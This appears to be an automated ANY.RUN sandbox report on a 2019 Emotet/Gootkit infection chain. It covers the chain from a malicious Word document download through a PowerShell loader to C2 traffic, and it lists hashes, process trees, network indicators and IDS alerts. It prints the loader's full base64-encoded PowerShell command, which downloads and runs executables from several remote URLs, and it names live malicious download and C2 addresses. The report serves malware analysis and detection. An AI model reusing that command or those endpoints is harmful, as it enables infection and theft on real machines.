analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://jsc.go.ke/wp-content/uploads/1i65w-ouoocl-sekjr/

Full analysis: https://app.any.run/tasks/f1de0aec-857d-415e-a470-2bf3dd47c9a9
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 15, 2019, 13:54:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
gootkit
emotet
feodo
emotet-doc
Indicators:
MD5:

554F2194A1576925FFA33A87905CC9DC

SHA1:

BBBBEE4F4E16E26EDBC6DA6B1F81DC44A4D1098A

SHA256:

9F79453B5161D59733477CE8AD6C139F84BD72DB66B36CF4C8A33BE6CDC8B049

SSDEEP:

3:N1KUBtLOAbYAQyUMTvKXuPXKn:CUBt6AEAZUVZn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • GOTKIT detected

      • powershell.exe (PID: 3768)
      • 299.exe (PID: 332)
    • Application was dropped or rewritten from another process

      • 299.exe (PID: 332)
      • 299.exe (PID: 2348)
      • soundser.exe (PID: 3128)
      • soundser.exe (PID: 4012)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3768)
    • Emotet process was detected

      • soundser.exe (PID: 3128)
    • EMOTET was detected

      • soundser.exe (PID: 4012)
    • Connects to CnC server

      • soundser.exe (PID: 4012)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3768)
    • Starts Microsoft Office Application

      • chrome.exe (PID: 2964)
      • WINWORD.EXE (PID: 2188)
    • Application launched itself

      • WINWORD.EXE (PID: 2188)
      • 299.exe (PID: 2348)
      • soundser.exe (PID: 3128)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3768)
      • 299.exe (PID: 332)
    • Starts itself from another location

      • 299.exe (PID: 332)
    • Connects to server without host name

      • soundser.exe (PID: 4012)
  • INFO

    • Reads Internet Cache Settings

      • chrome.exe (PID: 2964)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3036)
      • WINWORD.EXE (PID: 2188)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2188)
      • chrome.exe (PID: 2964)
    • Application launched itself

      • chrome.exe (PID: 2964)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
17
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winword.exe no specs winword.exe no specs #GOOTKIT powershell.exe 299.exe no specs #GOOTKIT 299.exe chrome.exe no specs #EMOTET soundser.exe no specs #EMOTET soundser.exe chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2964"C:\Program Files\Google\Chrome\Application\chrome.exe" http://jsc.go.ke/wp-content/uploads/1i65w-ouoocl-sekjr/C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
3576"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=73.0.3683.75 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x6ebb0f18,0x6ebb0f28,0x6ebb0f34C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
2768"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2968 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
3872"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=972,10658757632699496643,17954541270075751283,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwAAAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=14898389690031520514 --mojo-platform-channel-handle=956 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
73.0.3683.75
2480"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=972,10658757632699496643,17954541270075751283,131072 --enable-features=PasswordImport --service-pipe-token=2421393210364245799 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=2421393210364245799 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1936 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
73.0.3683.75
2920"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=972,10658757632699496643,17954541270075751283,131072 --enable-features=PasswordImport --service-pipe-token=12735527877377163818 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=12735527877377163818 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1980 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
73.0.3683.75
3452"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=972,10658757632699496643,17954541270075751283,131072 --enable-features=PasswordImport --service-pipe-token=12823147836293264646 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=12823147836293264646 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2076 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
2188"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\Rechnung_024366452281DE_Mai_15_2019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEchrome.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3036"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3768powershell -enc JAB3ADgANQA1ADIAMgBfADkAPQAnAGwAOQBfADUAOQAxADcAMAAnADsAJABBADAAOQA2ADkAOQAgAD0AIAAnADIAOQA5ACcAOwAkAEsANgA0ADgAOAAxADkAMAA9ACcAbwAxAF8AOAAyADcANwAnADsAJAB6ADMAMwA1AF8AOQBfADAAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEEAMAA5ADYAOQA5ACsAJwAuAGUAeABlACcAOwAkAFYAMwA1ADEAMgA3AD0AJwBGADkAXwAwADYAMgAyACcAOwAkAE0ANAA3ADgAMQA3AF8ANwA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AGUAYABCAGAAYwBMAEkARQBOAFQAOwAkAEQANwAxADUAMwBfADAAPQAnAGgAdAB0AHAAOgAvAC8AZAByAG0AYQByAGkAbgBzAC4AYwBvAG0ALwBlAG4AZwBsAC8AcABDAEEAZABPAEwAVwBMAEoALwBAAGgAdAB0AHAAOgAvAC8AaAB5AGIAcgBpAGQAYgB1AHMAaQBuAGUAcwBzAHMAbwBsAHUAdABpAG8AbgBzAC4AYwBvAG0ALgBhAHUALwBjAGcAaQAtAGIAaQBuAC8AdAA2AHkAZQAwAGoAXwB3AHkAaABmADQAeQB3AC0AMgAvAEAAaAB0AHQAcAA6AC8ALwBkAHUAcgBhAGsAYgB1AGYAZQBjAGUAbgBnAGUAbABrAG8AeQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ARwByAEkAQgBRAFQAbgBvAE8ALwBAAGgAdAB0AHAAOgAvAC8AcABlAHIAZgBvAHIAbQBhAG4AYwBlAHYAaQB0AGEAbABpAHQAeQAuAG4AZQB0AC8AcABhAHIAdABuAGUAcgAvAHIAcQAyAHQAbwB0AHYAXwBiAHIAeQBoAGQAcQBqAGMAMgAtADEANwAzADIAMAAvAEAAaAB0AHQAcAA6AC8ALwB0AG4AcgBrAGUAbgB0AG8AbgBvAGQAZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdgB4AGEAbABqAG4AZQBxAF8AZgA5AHYAYwB3AHYAcwB6ADAAMwAtADAAMQA1ADgANAA1ADUAMQA5AC8AJwAuAFMAUABMAEkAdAAoACcAQAAnACkAOwAkAEUAOQA2ADIAMgAwAD0AJwB6ADgAMQA5ADcANgAnADsAZgBvAHIAZQBhAGMAaAAoACQAawA0ADUANwAwADgANwAgAGkAbgAgACQARAA3ADEANQAzAF8AMAApAHsAdAByAHkAewAkAE0ANAA3ADgAMQA3AF8ANwAuAGQATwBXAG4ATABvAEEARABmAEkATABFACgAJABrADQANQA3ADAAOAA3ACwAIAAkAHoAMwAzADUAXwA5AF8AMAApADsAJABIADMANgAwADUAMwAyADUAPQAnAEYAMAA4ADQAXwAwADAAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJAB6ADMAMwA1AF8AOQBfADAAKQAuAGwAZQBuAEcAVABIACAALQBnAGUAIAAzADkAOAA4ADgAKQAgAHsALgAoACcASQAnACsAJwBuAHYAbwBrACcAKwAnAGUALQBJAHQAZQBtACcAKQAgACQAegAzADMANQBfADkAXwAwADsAJABmADEAMwA0ADgAOQAzADAAPQAnAFoANABfADEANAAwADcAXwAnADsAYgByAGUAYQBrADsAJABmADEAOAA2ADkAOQA3ADgAPQAnAHIANwBfADIAMwAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcAOABfADQAMwA2AD0AJwB2ADcAXwAxADMAXwA0ADcAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 627
Read events
3 070
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
13
Text files
59
Unknown types
23

Dropped files

PID
Process
Filename
Type
2964chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
MD5:
SHA256:
2964chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
MD5:
SHA256:
2964chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
MD5:
SHA256:
2964chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
MD5:
SHA256:
2964chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3
MD5:
SHA256:
2964chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000018.dbtmp
MD5:
SHA256:
2964chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\bba3b1ae-e562-4241-8ad6-5251d14aeb71.tmp
MD5:
SHA256:
2964chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index
MD5:
SHA256:
2964chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0
MD5:
SHA256:
2964chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
15
DNS requests
9
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4012
soundser.exe
POST
75.177.169.225:80
http://75.177.169.225/results/
US
malicious
4012
soundser.exe
POST
90.57.69.215:80
http://90.57.69.215/bml/badge/
FR
malicious
2964
chrome.exe
GET
200
41.204.161.190:80
http://jsc.go.ke/wp-content/uploads/1i65w-ouoocl-sekjr/
KE
document
145 Kb
malicious
4012
soundser.exe
POST
191.92.69.115:80
http://191.92.69.115/vermont/raster/ringin/
CO
malicious
3768
powershell.exe
GET
200
13.76.250.225:80
http://drmarins.com/engl/pCAdOLWLJ/
SG
executable
121 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2964
chrome.exe
172.217.22.67:443
www.gstatic.com
Google Inc.
US
whitelisted
2964
chrome.exe
172.217.18.3:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
4012
soundser.exe
191.92.69.115:80
CO
malicious
2964
chrome.exe
172.217.18.163:443
ssl.gstatic.com
Google Inc.
US
whitelisted
2964
chrome.exe
41.204.161.190:80
jsc.go.ke
Kenya Education Network
KE
malicious
2964
chrome.exe
172.217.16.206:443
clients4.google.com
Google Inc.
US
whitelisted
2964
chrome.exe
216.58.210.14:443
clients1.google.com
Google Inc.
US
whitelisted
2964
chrome.exe
172.217.16.132:443
www.google.com
Google Inc.
US
whitelisted
4012
soundser.exe
75.177.169.225:80
Time Warner Cable Internet LLC
US
malicious
4012
soundser.exe
90.57.69.215:80
Orange
FR
malicious

DNS requests

Domain
IP
Reputation
clientservices.googleapis.com
  • 172.217.18.3
whitelisted
jsc.go.ke
  • 41.204.161.190
malicious
accounts.google.com
  • 172.217.21.237
shared
www.google.com
  • 172.217.16.132
whitelisted
clients4.google.com
  • 172.217.16.206
whitelisted
ssl.gstatic.com
  • 172.217.18.163
whitelisted
drmarins.com
  • 13.76.250.225
malicious
www.gstatic.com
  • 172.217.22.67
whitelisted
clients1.google.com
  • 216.58.210.14
whitelisted

Threats

PID
Process
Class
Message
2964
chrome.exe
Potential Corporate Privacy Violation
ET POLICY Office Document Download Containing AutoOpen Macro
2964
chrome.exe
Executable code was detected
ET SHELLCODE Common 0a0a0a0a Heap Spray String
3768
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3768
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3768
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
4012
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
4012
soundser.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 12
4012
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
4012
soundser.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 22
3 ETPRO signatures available at the full report
No debug info